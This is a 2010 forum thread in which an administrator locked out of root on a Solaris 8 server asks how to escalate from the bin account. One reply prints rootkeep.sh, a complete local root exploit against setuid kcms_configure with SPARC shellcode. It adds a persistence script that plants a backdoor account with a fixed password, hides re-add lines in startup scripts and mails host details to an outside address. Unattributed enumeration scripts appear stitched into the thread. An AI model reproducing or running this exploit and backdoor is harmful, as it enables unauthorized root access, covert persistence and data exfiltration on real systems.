Solaris 8 - from bin to root


dazdaz

Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sat Sep 04, 2010 1:04 pm

Solaris 8 - from bin to root

Hi,

I am not sure where to post this, so I'll try in "Other - Hacking discussion"; apologies in advance if this is incorrect.

I have quite an interesting UNIX Admin dilemma.

I have a Solaris 8 production server where the root user entry in the passwd file has been overwritten with some random text, voiding the root user completely.  I am trying all methods to obtain uid 0 and change this back to the correct entry before I try a final and last resort of "boot cdrom -s", which becomes complicated when the server is in a remote unmanaged datacenter.

Through some luck, I can switch to the bin user using what appears to be a misconfigured sudo with the command, "sudo -u bin bash"

How can I then switch from bin to root?  What vulnerabilities exist which would allow me to do this?

I've been looking over /etc/security/exec_attr to see what commands run privileged.  sudo is suid root and version 1.6.8p7 if I recall correctly.

Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root.

The box also has VxVM 4.x installed.
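Before reaching for an exploit from that bin shell, the two checks a practitioner would run first, as an added example that is not part of the thread or of any poster's code: which RBAC profiles the account holds and which of their exec_attr commands run with uid=0 or euid=0 (the exec_attr review the post describes, automated), and which files on a path a privileged process will execute are already writable by the account. The user_attr and exec_attr layouts are the Solaris 8 ones; the entries in the script are constructed sample data, and whether any bin-writable file actually sits on root's execution path on a given box is an assumption to verify, not something the thread establishes.

```shell
#!/bin/sh
# Added example, not from the thread: enumerate from the unprivileged shell
# before touching any exploit. Two checks: (1) which commands Solaris RBAC lets
# this account run as uid 0 via pfexec/a profile shell, (2) which files on a
# privileged execution path the account can already write.
#
# File formats assumed (Solaris 8):
#   user_attr : user:qualifier:res1:res2:attr        attr carries profiles=A,B
#   exec_attr : name:policy:type:res1:res2:id:attr   attr carries uid=/euid=
# The entries below are constructed sample data so the script runs offline;
# the real files are /etc/user_attr and /etc/security/exec_attr.
SAMPLE_USER_ATTR='root::::auths=solaris.*,solaris.grant;profiles=All
bin::::profiles=Media Backup,Printer Management
dazdaz::::profiles=Basic Solaris User'

SAMPLE_EXEC_ATTR='All:suser:cmd:::*:
Media Backup:suser:cmd:::/usr/bin/mt:euid=0
Media Backup:suser:cmd:::/usr/sbin/tar:euid=0
Printer Management:suser:cmd:::/usr/sbin/lpadmin:euid=lp;egid=lp
Printer Management:suser:cmd:::/usr/bin/enable:euid=lp
Basic Solaris User:suser:cmd:::/usr/bin/ls:'

# profiles_for USER USER_ATTR_TEXT -> one profile name per line
profiles_for() {
    printf '%s\n' "$2" | awk -F: -v u="$1" '
        $1 == u {
            n = split($5, kv, ";")
            for (i = 1; i <= n; i++)
                if (kv[i] ~ /^profiles=/) {
                    sub(/^profiles=/, "", kv[i])
                    m = split(kv[i], p, ",")
                    for (j = 1; j <= m; j++) print p[j]
                }
        }'
}

# root_cmds_for USER USER_ATTR_TEXT EXEC_ATTR_TEXT -> "profile<TAB>command"
# for each exec_attr entry in the user's profiles that sets uid=0 or euid=0.
# Anything listed here runs as root on the user's say-so; read those binaries
# (and check who can write them) before looking anywhere else.
root_cmds_for() {
    profiles_for "$1" "$2" | while IFS= read -r prof; do
        printf '%s\n' "$3" | awk -F: -v p="$prof" '
            $1 == p && $7 ~ /(^|;)e?uid=0(;|$)/ { print p "\t" $6 }'
    done
}

# perm_writable FILE -> true when the permission bits let this account write
# FILE: owner bit if we own it, group bit if we are in its group, world bit
# otherwise. Bits are used instead of test -w so the answer describes the
# file rather than the privileges of whoever runs the check.
perm_writable() {
    set -- "$1" `ls -ldn "$1"`      # $2=mode $4=uid $5=gid
    mode=$2 fuid=$4 fgid=$5
    case $mode in ????????w*) return 0 ;; esac
    [ "$fuid" = "`id -u`" ] && case $mode in ??w*) return 0 ;; esac
    for g in `id -G`; do
        [ "$g" = "$fgid" ] && case $mode in ?????w*) return 0 ;; esac
    done
    return 1
}

# writable_hooks DIR... -> regular files under DIRs that perm_writable accepts.
# Point it at what root will execute or read on this box (rc/init scripts,
# crontabs, the commands root_cmds_for printed). A writable file there is a
# root code-execution path with no exploit needed; whether bin can write any
# such file on a given Solaris 8 install is something to verify, not assume.
writable_hooks() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f 2>/dev/null | while IFS= read -r f; do
            if perm_writable "$f"; then printf '%s\n' "$f"; fi
        done
    done
}

# Demo on the constructed data; on the box, substitute the real file contents.
echo "== uid-0 commands reachable by bin via RBAC (sample data) =="
root_cmds_for bin "$SAMPLE_USER_ATTR" "$SAMPLE_EXEC_ATTR"
echo "== writable files on root's execution path =="
writable_hooks /etc/init.d /etc/rc2.d /etc/rc3.d /var/spool/cron/crontabs
```

On the real box, pass the live files instead of the samples (`root_cmds_for bin "`cat /etc/user_attr`" "`cat /etc/security/exec_attr`"`) and point writable_hooks at the directories root's startup and cron actually execute from plus the commands the first function listed; an empty result from both is the signal that an exploit, not a misconfiguration, is the only way forward.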

sil

Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat Sep 04, 2010 1:49 pm

Re: Solaris 8 - from bin to root

Alright, so depending on your patch levels, you should be able to use something I wrote about 12 years ago called rootkeep.sh (http://packetstormsecurity.org/0006-exp ... ootkeep.sh) Read it, use at your own risk, modify the email address, and so on. Should do the trick (still does on 2.6 - 2.9)

  Code:
#!/bin/sh
################################################
#
# Rootkeep version *somefin_r33t_goes_here*
# Gain root via kcms.. Follow instructions and
# script will ensure an instant backdoor every
# reboot. Fscking Solaris start-up scripts suck
# Code for KCMS was chopped up by Shadow Pengiun
# Society
# @rwxr--r-- #unixgods (efnet)
#
################################################

# Step 1: write out the KCMS exploit. The heredoc is quoted so the shell
# leaves the C source alone.
cat > kcms.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Stack overflow in the setuid-root kcms_configure via an oversized NETPATH
 * environment variable. Offsets, NOP and shellcode are SPARC/Solaris only. */
#define ENV         "NETPATH="
#define MAXBUF      3000
#define RETADR      2116        /* offset of the saved return address */
#define RETOFS      0x1300      /* distance below our %sp to land in the sled */
#define EXPADR      1200        /* where the shellcode goes in the buffer */
#define FAKEADR1    2092        /* two saved frame pointers, both pointed */
#define FAKEADR2    2112        /* back into our own buffer */
#define NOP         0xa61cc013  /* xnor %l3,%l3,%l3: harmless sled filler */

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* SPARC only: return the current stack pointer in %i0. */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

int main(void)
{
    char            buf[MAXBUF];
    unsigned int    i,ip,sp;

    putenv("LANG=");
    sp=get_sp();
    printf("ESP =0x%x\n",sp);

    /* fill the whole buffer with the NOP sled, big-endian word by word */
    for (i=0;i<MAXBUF-4;i+=4){
        buf[i+3]=NOP&0xff;
        buf[i+2]=(NOP>>8)&0xff;
        buf[i+1]=(NOP>>16)&0xff;
        buf[i  ]=(NOP>>24)&0xff;
    }

    /* fake frame pointers so the register windows unwind into our buffer */
    ip=sp;
    printf("FAKE=0x%x\n",ip);
    buf[FAKEADR1+3]=ip&0xff;
    buf[FAKEADR1+2]=(ip>>8)&0xff;
    buf[FAKEADR1+1]=(ip>>16)&0xff;
    buf[FAKEADR1  ]=(ip>>24)&0xff;
    buf[FAKEADR2+3]=ip&0xff;
    buf[FAKEADR2+2]=(ip>>8)&0xff;
    buf[FAKEADR2+1]=(ip>>16)&0xff;
    buf[FAKEADR2  ]=(ip>>24)&0xff;

    /* return address: somewhere inside the sled below our stack pointer */
    ip=sp-RETOFS;
    printf("EIP =0x%x\n",ip);
    buf[RETADR+3]=ip&0xff;
    buf[RETADR+2]=(ip>>8)&0xff;
    buf[RETADR+1]=(ip>>16)&0xff;
    buf[RETADR]=(ip>>24)&0xff;

    /* drop the shellcode into the sled, prefix the variable name, export it */
    strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));

    strncpy(buf,ENV,strlen(ENV));
    buf[MAXBUF-1]=0;
    putenv(buf);

    execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",(char *)0);
    perror("execl");
    return 1;
}
EOF

echo "Please wait"
# Step 2: build it under an innocuous-looking name.
gcc kcms.c -o /usr/dt/examples/dtdnd
chmod +x /usr/dt/examples/dtdnd

# This retains your root shell by piecing
# echo'd predefined user and password into
# separate Solaris start up scripts which
# we all know are a nightmare...

# Step 3: write the persistence script. Quoted heredoc: every $VAR and
# backtick below must reach the file unexpanded.
cat > dtwsm << 'EOF'
#!/bin/sh
# rootkeep v.1
# sil@antioffline.com

USER="dtserver:x:2012:2012::/usr/dt:/bin/sh"
MAIL="intrusion@engineer.com"
PATH=/usr/dt/examples:/usr/bin:/usr/sbin:/sbin
FILE1=/etc/rc2.d/K40syslog
FILE2=/usr/platform/sun4u/lib/flash-update.sh
HOST=`ifconfig -a`
PASS=/etc/passwd
SHAD=/etc/shadow
INFO=/usr/dt/examples/dtinfo
STRN="dtserver:uFBzOiICo3deU:11107:7:91:28:::"
# string equates to p4$sW3rD (single-quoted so $s is not expanded)
WORD='p4$sW3rD'

# Solaris 8 /usr/bin/grep has no -q, so discard output instead.
if grep dtserver $PASS > /dev/null
then
   echo $HOST is already backdoored >> $INFO
   mail -s dtserver $MAIL < $INFO
else
   echo $USER >> $PASS
   echo $STRN >> $SHAD
   echo $HOST backdoored >> $INFO
   mail -s dtserver $MAIL < $INFO
fi

if grep dtserver $SHAD > /dev/null
then
   echo Password is set to $WORD | mail -s dtserver $MAIL
else
   # re-add the account from two start-up scripts on every boot
   echo "echo dtserver:x:2012:2012::/usr/dt:/bin/sh >> /etc/passwd" >> $FILE1
   echo "echo dtserver:uFBzOiICo3deU:11107:7:91:28::: >> /etc/shadow" >> $FILE2
fi
EOF

# Step 4: install the persistence script next to the exploit, then run the
# exploit (it execs kcms_configure, so anything after it only prints once
# the root shell exits).
chmod +x dtwsm
mv dtwsm /usr/dt/examples/dtwsm

echo "Now type /usr/dt/examples/dtwsm from the root shell and you're set...."
/usr/dt/examples/dtdnd


dazdaz

Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sat Sep 04, 2010 2:46 pm

Re: Solaris 8 - from bin to root

Hi, thanks for the reply, I really appreciate it; however, there is something that doesn't quite make sense to me.  The comments at the top of the script suggest that after you've rebooted the system you'll obtain root access.

If I reboot the system then I may as well send a technician to the datacenter to insert a Solaris CD and boot off the cdrom into single user mode using the serial console and mount the root file-system and edit/correct the root entry in the passwd file manually, as both methods will cause system downtime.

As this is a production server there is no compiler installed although I am sure that I can find one somewhere.

The patch levels are not the most current, nor does it make use of the Solaris 8 vintage patching service.

Quote:
"# Follow instructions and script will ensure an instant backdoor every reboot.
# Fscking Solaris start-up scripts suck"
Last edited by dazdaz on Sat Sep 04, 2010 2:50 pm, edited 1 time in total.

sil

Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat Sep 04, 2010 3:46 pm

Re: Solaris 8 - from bin to root

Please read through the script and what it sets out to accomplish and what it ends up doing. Step by step:

1) Compile an exploit aimed at KCMS
2) Exploit KCMS
3) Acquire a root shell
ADDONS
4) Add a root level user account using a predefined password
5) Add modifications to start up script to ENSURE a root shell upon a reboot

If you go through steps 1, 2 and 3, you'd get root, what you choose to do from there is up to you.
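Steps 1 to 3 above assume two things that the rest of the thread shows were not true on this box: that the setuid-root target exists at the expected path and that a compiler is available. A pre-flight check for any local exploit candidate, as an added example that is not part of the thread or of the rootkeep script (the kcms_configure and sudo paths are the ones named in the thread; the extra compiler locations are common Solaris ones and are assumed, not verified):

```shell
#!/bin/sh
# Added example, not from the thread: pre-flight a candidate local exploit
# target before spending a round trip on it. The thread lost two turns to
# exactly these (no /usr/openwin/bin/kcms_configure on the box, no compiler),
# so check what the exploit needs first: a setuid-root binary at the expected
# path, and a way to build the payload. Compiler paths are assumed defaults.

# setuid_status PATH -> missing | not-executable | not-setuid |
#                       setuid-nonroot | setuid-root
# Only setuid-root is a privilege boundary worth attacking from an
# unprivileged shell; everything else is wasted effort.
setuid_status() {
    [ -e "$1" ] || { echo missing; return 0; }
    set -- "$1" `ls -ldn "$1"`         # $2=mode  $4=owner uid (numeric)
    case $2 in
        ???[sS]*) if [ "$4" = 0 ]; then echo setuid-root; else echo setuid-nonroot; fi ;;
        ???x*)    echo not-setuid ;;
        *)        echo not-executable ;;
    esac
}

# compiler_available -> prints the first usable C compiler, status 1 if none.
# Without one, a C exploit has to be built elsewhere for this exact
# architecture and copied over (the poster's "no compiler" problem).
compiler_available() {
    for c in gcc cc /usr/local/bin/gcc /opt/sfw/bin/gcc /usr/sfw/bin/gcc; do
        command -v "$c" 2>/dev/null && return 0
    done
    return 1
}

# preflight TARGET -> prints a one-line verdict; exit 0 only when TARGET is
# setuid root and a compiler exists, so a wrapper can refuse to continue.
preflight() {
    st=`setuid_status "$1"`
    cc=`compiler_available` || cc=none
    printf '%s: %s; compiler: %s\n' "$1" "$st" "$cc"
    [ "$st" = setuid-root ] && [ "$cc" != none ]
}

# Demo on the two binaries the thread talks about. On a box without
# OpenWindows the first line reads "missing", which ends the KCMS idea at once.
preflight /usr/openwin/bin/kcms_configure || :
preflight /usr/bin/sudo || :
```

The same check applies to the exploit-db candidates mentioned later in the thread: read each exploit's target path and build requirements, run preflight against them, and only ship source to the box for the ones that pass.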

dazdaz

Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sat Sep 04, 2010 4:03 pm

Re: Solaris 8 - from bin to root

Sorry, I should have spent longer reading through the script.

There isn't a directory named /usr/openwin/bin (no OpenWindows, removed for increased security) and thus no kcms to exploit on the box.

sil

Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat Sep 04, 2010 5:08 pm

Re: Solaris 8 - from bin to root

The harsh reality is, you're safer having someone go through the motions of a single-mode boot to fix the password; however, even with a single-user boot, I don't believe they'd be able to get far under certain conditions... Is the PROM protected? If so, I *do* hope that password is remembered.

Now, you stated that the password entry for root is borked, and while this is fixable, a lost PROM password is a whole "nother" ballgame. So do you know if "security-mode" is set to full on the PROM? If so, then you'll have to make sure whoever is booting into single mode knows this and knows the password for getting past the PROM.

Again, to be on the safe side, you'd be safer to get someone to go through the motions (boot -s) however, make sure you have all the information down to a science (supplied them with all the credentials, etc.) otherwise the longer that server is down, the more money you potentially lose. If you do want to keep on trying local exploits, you can try the linked local exploits for Solaris. Again, use those and ANY exploit at your own risk.

http://www.exploit-db.com/exploits/1182/
http://www.exploit-db.com/exploits/715/

I had a similar scenario last week with a FreeBSD 8.1 box I deployed to do flow-analysis. I created the machine for a client to run tshark, etc and SCP over the files to me on an hourly basis for analysis. The client supplied the server, I installed and scripted some tools and I created the password based on what the client wanted... Guess what? He lost the password and there was NO ONE around to boot into single mode for me. The machine itself was in another state and NOT a NOC where I would have had someone to do anything for me. Lo-and-behold one of kingcope's local exploits came in handy for me. From $USER to root in less than 10 minutes (about 8 were spent shmoozing via email and searching).

Anyway, my rambling is beside the point I guess... You're better off having someone ON-SITE do any changes to be on the safer side. I'd suggest having them perform these changes as late (non-used hours) as possible and enforce this. I've seen NOCs and their engineers say "sure... at 3AM alright", then turn around 15 minutes later. Your SLA is king ;)  Also, if possible you'd want to know WHO would be making the changes (booting into single) beforehand so you can walk through the motions with them either via email or on the phone. This ensures (as best as possible) that someone with a clue is going to make the change.

dazdaz

Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sun Sep 05, 2010 2:48 am

Re: Solaris 8 - from bin to root

Great, the ldpreload exploit should work from checking the patch revisions on the box.

Believe it or not, there is no PROM security.

We believe it was one of two developers who overwrote the passwd file, although why they were editing it in the first place we don't know.

This type of scenario would make a great UNIX admin interview question, although I hope that I never see this type of problem ever again :-)

I haven't used FreeBSD for ages, but it's a great platform!

dynamik

Recruiters

Posts: 1134

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sun Sep 05, 2010 8:59 am

Re: Solaris 8 - from bin to root

I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?
The day you stop learning is the day you start becoming obsolete.

sil

Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sun Sep 05, 2010 10:21 am

Re: Solaris 8 - from bin to root

dynamik wrote: I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?

Take note: "Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root." He didn't have access to an account that had enough privileges.

Solaris from an admin level is no different from Linux. The command syntax is a lot different but at the end of the day, the core is the same. If he had access to an account to write to it, he would have been able to make the change.

A long time ago I ran into a similar problem under Solaris; however, root as a user was completely gone and I literally had to retype the account in vi via single mode. I've also run into this situation on zones on Solaris. Because a root user in one zone can't do what a root user in that container can, I had to root as root a container ;)

Solaris is a funny OS; at the end of the day, though, no different from Linux. He just didn't have privileges. On the flip side, if he was using containers/zones, he'd have been hit, since getting root on one container does nothing for another zone. (Who's on first? No, Who's on second...)

dynamik

Recruiters

Posts: 1134

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sun Sep 05, 2010 12:26 pm

Re: Solaris 8 - from bin to root

Ah, so they simply don't have access anymore. Thanks.
The day you stop learning is the day you start becoming obsolete.
